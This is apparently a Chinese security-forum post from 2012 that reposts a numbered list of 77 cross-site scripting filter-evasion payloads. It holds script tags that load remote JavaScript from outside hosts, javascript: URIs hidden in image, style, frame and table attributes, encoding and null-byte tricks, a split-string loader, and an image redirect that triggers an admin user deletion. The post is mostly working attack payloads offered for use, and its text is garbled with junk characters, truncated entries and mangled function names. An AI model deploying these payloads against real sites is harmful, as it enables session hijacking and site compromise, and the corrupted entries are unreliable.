貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。$ _! o/ T' D" O, }! v; E1 J8 D
0 K+ G S9 _' X4 `/ W- [, @% t
(1)普通的XSS JavaScript注入$ B3 @7 w y3 C f9 u5 M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' ^( n0 a2 z; ~4 b2 W" k" W
! w* F! B( o$ [; c7 W (2)IMG标签XSS使用JavaScript命令
/ G& r* k5 M: I; M: y. z: b <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& ?- c+ ^' n& W4 V
% d/ N, M2 x6 E' }3 E
(3)IMG标签无分号无引号
* E0 y' v8 R& p. J! H( J <IMG SRC=javascript:alert(‘XSS’)>
/ g# _& a5 K' l! X" z5 S) [6 b! o" f9 ?9 f: _5 \) l; k2 u
(4)IMG标签大小写不敏感
0 G6 C# S$ e) M <IMG SRC=JaVaScRiPt:alert(‘XSS’)>& M! B* H( q8 X+ J
$ f' O1 t9 j- b
(5)HTML编码(必须有分号)) i7 J6 X5 k" Q6 N
<IMG SRC=javascript:alert(“XSS”)>
_5 b( e! v5 h; c" R, c- n: M0 g$ y' ?6 E
(6)修正缺陷IMG标签' V/ i& d( G9 H, e m
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ ]4 x9 k9 T' Q) x5 j* Z1 K8 c. X! D1 F8 {' d, N
(7)formCharCode标签(计算器)' H9 S! x$ a1 y" ]0 t0 Y+ k7 J
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
' T7 v' Q: z& u0 y4 C. N
. J* W7 ?2 ~ x, R& k, a (8)UTF-8的Unicode编码(计算器)
( z, t8 h! u4 T/ U* y8 Z! }# K. j; x! l- v <IMG SRC=jav..省略..S')>+ ?. l- e! m8 c1 [
+ a& A0 k R5 E. ^# i! N (9)7位的UTF-8的Unicode编码是没有分号的(计算器) m9 e5 S2 K. d! y0 M+ y' ~
<IMG SRC=jav..省略..S')>
M4 S) |. z; I1 n3 g, D9 u0 S/ N$ x" a3 _
(10)十六进制编码也是没有分号(计算器)
0 D2 |3 p9 l5 a, a! p ` n <IMG SRC=java..省略..XSS')>
; L5 `, O. @. g' c- R, Z8 c3 I% {9 ]0 M8 f: v$ O
(11)嵌入式标签,将Javascript分开
4 A3 f" n3 y: e4 G. R3 \ <IMG SRC=”jav ascript:alert(‘XSS’);”>
1 i2 R6 K2 e9 }, g7 L% T+ o/ o! T8 D' J, l/ V/ E
(12)嵌入式编码标签,将Javascript分开9 ]- \% x. ]5 _6 |0 i9 D# s
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& ~8 s J" O5 `& b. D, _
/ F+ [/ q. O x7 l5 W! a7 o4 f/ y (13)嵌入式换行符
! Y: X& W: L1 n. ?5 Y; b0 S <IMG SRC=”jav ascript:alert(‘XSS’);”>% T0 u1 U; v ^4 }! t
' ]1 v E3 A: M! T (14)嵌入式回车: x7 t2 m: H0 X: l/ e7 ^9 D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ L( B5 C" P$ `$ G4 ~8 c$ t' e$ B |+ c$ i
(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 I+ T+ Z3 c: q3 c
<IMG SRC=”javascript:alert(‘XSS‘)”>
; L& G* H* t. R" ]5 X: B* S
' H% B* R: v9 G6 r7 O% ]/ m _ (16)解决限制字符(要求同页面)
! a0 S Q) `( X9 @ <script>z=’document.’</script>; |$ E, m) H2 X
<script>z=z+’write(“‘</script>& t% w" p* b2 W7 K
<script>z=z+’<script’</script>% P) `0 {' ~' j! G. _9 P8 T: R
<script>z=z+’ src=ht’</script>5 y [' z K9 q, O0 F' @' Z
<script>z=z+’tp://ww’</script>! K& S4 I0 F0 x
<script>z=z+’w.shell’</script>9 U4 L( t# Z& y1 A3 q) a
<script>z=z+’.net/1.’</script>5 w$ P( c9 Y8 H6 X- P! f
<script>z=z+’js></sc’</script>( B8 V) F6 b0 O' Y# U( e0 M
<script>z=z+’ript>”)’</script>
( g: ~/ w4 u" Q; K; s6 c" { <script>eval_r(z)</script>
! w0 l% S5 m( s+ g7 F& e: w& [+ a; v) g( y* `+ w7 w! B: S6 S
(17)空字符
! Y% c) ] p- ~/ [ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' E( A y0 P8 S) r' [) g: k# v; n& W9 |- L6 Q7 F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用% _) [( G/ x, I5 s# e
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 P% [/ Y- L! r
$ O; _8 A7 T/ Y (19)Spaces和meta前的IMG标签
- u* o6 R1 N5 `. v( C <IMG SRC=” � javascript:alert(‘XSS’);”>
% w$ l* V2 `& o3 P8 H
! I1 ]! B7 z4 A5 I2 W$ z (20)Non-alpha-non-digit XSS. g& f1 V# I9 O: G) j, @ f
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# k% V$ u/ d9 X: x, u; }$ I! k% y
8 J J8 u1 a) ^6 N7 ?1 k (21)Non-alpha-non-digit XSS to 2
- U2 u& d" E% |/ B0 Q3 N$ |! Y. L <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 C* h* f2 v- K/ Q1 `( y
Y/ K& j, k0 U! }8 a- I; x( r1 J
(22)Non-alpha-non-digit XSS to 35 D! q1 {) C+ n0 A4 Q1 U, C7 M
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ ]1 y% \: V4 I8 @
. m- k4 r+ {! T& n (23)双开括号0 O2 I" D3 }/ T8 J6 f6 C: Y. ?
<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 O2 J) g& ^0 V
, Y4 Q1 E3 {% H: z7 m (24)无结束脚本标记(仅火狐等浏览器), w* x7 m+ ~8 e* V
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 S) b7 m0 C8 y$ }! |* @. N5 w
$ a+ j- M+ _$ W+ H) l0 ?3 D (25)无结束脚本标记26 Y; H; L( Z) a; D* k6 G2 d; c
<SCRIPT SRC=//3w.org/XSS/xss.js>' j0 o! \6 h' ]8 t2 F* a$ P: T3 U
" R7 P4 v- J$ o1 ]$ b/ F x (26)半开的HTML/JavaScript XSS
) K) l& } I/ w <IMG SRC=”javascript:alert(‘XSS’)”9 _: U% i) x" U! s4 l
7 T: {5 y" i+ U! C' o" @
(27)双开角括号2 r" x9 \/ T. t5 ~
<iframe src=http://3w.org/XSS.html <
/ A# D) V* j' K- a- q$ p w% w' l! s, K! [- x) A
(28)无单引号 双引号 分号2 k! ?9 C( g8 ` E& c
<SCRIPT>a=/XSS/
0 Y! k1 m2 d6 j. S, J. @5 v7 T alert(a.source)</SCRIPT>/ k# C( M$ n) z& R G0 |: W& _9 \
4 `+ L$ L# b# [6 V% m9 l% C3 j (29)换码过滤的JavaScript; a8 l- @( w2 {3 G, z
\”;alert(‘XSS’);//
/ U/ S" e" K- d, F2 W; ^% n4 H* }/ b, S. O; o, S
(30)结束Title标签
% i# |6 P K7 R& X" {: X4 y: I </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 o# q- k, k# }/ V' E7 _- b% Q% B( C' Z! G: w
(31)Input Image
1 X& v$ _. U+ Q9 ?: H. x1 G. u <INPUT SRC=”javascript:alert(‘XSS’);”>
+ R4 `% V* Z! o( b8 t2 z0 I
+ U8 ~+ O- c6 g3 ^, f$ @$ W* c$ V (32)BODY Image' C$ r+ B# a: C) w' }8 |+ c. y; l- e$ r
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( u o- E) p% Q: M8 T+ H& v+ G. d% \, W5 W7 J5 g3 @
(33)BODY标签4 A. C) B# F" J) A
<BODY(‘XSS’)>0 I: @3 j! b+ t; F$ g1 C
2 {" y. M5 _' j4 m0 @7 N& m
(34)IMG Dynsrc$ `' v+ ^/ M" y8 y9 y8 O: P2 {9 R
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
{* M4 L( ~0 m5 R3 W# x3 n, ^) C: K U P. {
(35)IMG Lowsrc
1 A+ T; t. \7 T( g0 S/ M* U <IMG LOWSRC=”javascript:alert(‘XSS’)”>
& O3 `2 G% F$ z0 I# U
P" I/ _: M7 o: H3 B (36)BGSOUND
" j7 v0 V" [; x <BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 A, H9 L2 T. c. Q' t
" v( e* Q6 Q8 ~& w (37)STYLE sheet
7 ~ g! C( ]9 D3 I <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 ^& y# i+ y& U4 _
" S2 a. R0 ^+ n1 l- h5 O# L (38)远程样式表; X5 _' H9 c9 u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 t3 |' _, l+ y/ a2 t, T% l
& N! f) f4 H( Z; y- U" y& H) P# j1 |
(39)List-style-image(列表式)
- ^0 ^9 M" u) r9 |& X9 Q1 h <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; h( E: i0 k2 a' l& c0 t+ X
6 a1 e2 }. [" m (40)IMG VBscript% E* s, C& I* c2 r! d
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 R/ I7 L8 Q# L" e! i
: ?4 Y" j/ k. |& E& h* P o (41)META链接url
6 R+ Z9 q) H4 j <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
/ l8 Q' D1 l d5 Q0 N
8 k2 ? f% J0 X) H. {/ _5 f- W (42)Iframe C3 {2 W8 Y- {
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 n0 y0 R' d3 \3 R0 `; Y( k
/ u/ z& u& ]7 J- u8 ^
(43)Frame
0 S& c% C' g2 O& M <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>0 X. z8 `+ m% { ?+ y. X" _/ Z
5 l* K) |9 I$ a (44)Table4 o3 ~3 ^# A# V+ t9 o& I
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 T# f7 M% d& ^% Y- |/ m5 e+ K; X; N. _# |0 x3 _$ ?( S d- `0 r
(45)TD4 v% f2 I$ i0 W( V
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) T$ w" q& ~" T) P$ _+ A! N7 k" @# n/ s. U, A
(46)DIV background-image2 H4 ~$ r( @! J8 g! h; Q) c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 d( t6 b! T/ i
# q# X) s5 y* u, C (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. R/ l s% b! F: R <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>9 u E. m$ ^- i7 L
# ~, Q8 V# S: M
(48)DIV expression
9 V, |& ?5 u7 u$ }( k, D ` <DIV STYLE=”width: expression_r(alert(‘XSS’));”>* I [' v4 v1 N5 O3 j' I9 R: ?
; Q% O# Q" \7 a0 X V
(49)STYLE属性分拆表达
" V! b# j; {$ X% w1 L <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 M/ K6 Y; H; R8 x; O' Y9 C
- b/ E; w/ A% C (50)匿名STYLE(组成:开角号和一个字母开头)! ^5 }9 c9 d: g7 T
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 o; c2 x9 i% ~( j9 ~" s4 A( T) K+ D- u
(51)STYLE background-image
- u$ A, S2 H9 k1 O. |, W <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) s& ]3 G" j0 i
+ }& r- ? W' l D8 k l (52)IMG STYLE方式
/ c* J/ s- s4 [7 L exppression(alert(“XSS”))’>0 r$ C0 P0 X3 u1 _4 O
3 l1 _& X$ j+ f Q6 Y
(53)STYLE background1 _* R9 y: H& B! z: G: I" v3 j$ E
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; `0 Q- u# P; d) X% E8 C# G5 R0 p# y. \) S
(54)BASE
4 W, t/ e5 n+ p" H0 K <BASE HREF=”javascript:alert(‘XSS’);//”>
8 g( H* b6 t; |6 v4 T6 L* S4 y, k1 E7 O7 n2 [2 U4 s: ?0 g
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 o/ i& R v) d- _6 F <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 e6 V) D- v' j( Y
* N [9 {0 L8 n6 ]* L& L0 F
(56)在flash中使用ActionScrpt可以混进你XSS的代码2 v2 J6 @6 a* m8 ~* r& k
a=”get”;
/ b* f- H9 U# i/ @# d+ Q1 s" l b=”URL(\”";% T+ o u" P5 v, }8 B7 {
c=”javascript:”;( f. T; e5 g" h! q, f; J& C: b8 [3 W/ `$ L
d=”alert(‘XSS’);\”)”;
2 _- v* |% B- D# N$ n5 l eval_r(a+b+c+d);$ u w7 n. V5 @$ Q) F$ W
; s+ {3 @+ t" ^6 d+ V$ r8 V; ?8 E
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 o' L* {5 x, Z w6 H1 Q8 ] <HTML xmlns:xss>. \/ w: I* U& I4 C+ [) e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
4 }2 d8 P# n( u3 ?; N) o" s <xss:xss>XSS</xss:xss> I$ F/ K; W6 r* X% G4 P8 i5 R" D
</HTML># q1 q1 r8 r; u/ X/ s# \5 {
2 {; [. ?+ f4 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用( V* ^$ V1 b2 W/ |
<SCRIPT SRC=””></SCRIPT>7 y+ c$ X5 ?( I0 H( J' e$ q4 C7 ]
" e1 T3 L: b- A1 Z& O8 Z
(59)IMG嵌入式命令,可执行任意命令. O4 b( T6 V$ J% G
<IMG SRC=”http://www.XXX.com/a.php?a=b”>- ~3 m% Q/ K/ Q5 ~/ Q
$ P. M" j" j( E0 _! K0 T
(60)IMG嵌入式命令(a.jpg在同服务器)
* W4 P1 z U, _. K Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
- I% S/ ~# D1 i% x* W4 |3 ]1 J! c, _3 j! y5 E% k
(61)绕符号过滤& p% y9 m& Q9 B0 o$ n
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 n- w. Y: E3 Y7 r! w. h1 j0 J2 K, L( _
$ s+ a# D h, ~' T (62)& O0 S: J) l+ F5 U) H$ |8 Y2 N
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 Y* N8 W# v5 o" B
/ k7 R( F3 V2 E$ k- S/ d( s (63)/ |+ ^5 q4 n: f$ m
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>$ s! D# ^& V# Q% S$ \7 A, j2 l
5 L* C/ \1 B% ]$ ~7 _; V. q (64)
% A; j( p8 f0 Z4 f& z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* {" P6 _1 [+ c+ p! Q5 \* P
6 [- `& o( |. l4 ~( p* O
(65), w0 {; P; N: _4 T! W1 n
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! |2 \9 @: B3 u
' V% f; Z% W" e4 n) J0 p (66)+ b/ `' Q6 U) e4 O$ y9 z9 R1 Y; f8 `* y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ R* x: v: O$ r" x P) `: i4 H) S2 b/ G* e/ T9 o9 q
(67)" O! h* W! C# {6 f
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( G# O! Y7 q9 F" u9 q! V3 c
2 w$ K) Q5 N) p' E. ^) t
(68)URL绕行5 K. W" d' Q* @" I; }- C
<A HREF=”http://127.0.0.1/”>XSS</A>, [' I v' s# ]% ^
9 W5 P! z; p: E. B& s7 F (69)URL编码$ P. ^8 L7 d8 |# c! t
<A HREF=”http://3w.org”>XSS</A># b! Z% ^+ Q9 f9 f6 B7 I3 n4 n
_; v- J; e: ^
(70)IP十进制6 P a: x8 y% s& {
<A HREF=”http://3232235521″>XSS</A>
_3 ^ G7 t; r1 p% k
) W/ |. R9 O `8 V8 W$ x, h (71)IP十六进制6 j6 L/ Z7 i0 h9 W& [7 g
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>; W. o8 ?8 W! @! s/ e+ }
% _& D+ q" K7 o$ i0 H) f
(72)IP八进制2 F# C8 b8 x0 P& y& w
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 k! R* i4 ~- J% e2 `2 ?- Z4 d& q
( }* x( z8 U, O. ]" n& r8 k (73)混合编码7 b/ g: U. C! E( A8 s8 w1 t7 z
<A HREF=”h; r8 \$ i: ~* C
tt p://6 6.000146.0×7.147/”">XSS</A>
) l7 r1 w2 |* l3 V# g3 Q: V8 g2 G2 v9 d$ h8 @$ E7 J Z
(74)节省[http:]4 l/ X' W" I" v( }9 `: Z
<A HREF=”//www.google.com/”>XSS</A>
* P8 H8 C+ S# ?5 @* Q, V
9 r A- o) Q# Y, t- C7 E* g" | (75)节省[www]* l- |" m7 |6 E9 u6 v5 [
<A HREF=”http://google.com/”>XSS</A>
7 J# x( B9 v0 E6 D7 S3 N4 m0 m; Q) n3 Y/ [% H- V
(76)绝对点绝对DNS6 E2 R0 P6 C# e
<A HREF=”http://www.google.com./”>XSS</A>
, q& a% d2 P3 n( d7 X2 W, ]! T# a/ _2 B, T1 g! J
(77)javascript链接+ [# k6 B1 \6 U" `$ s. K; [
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对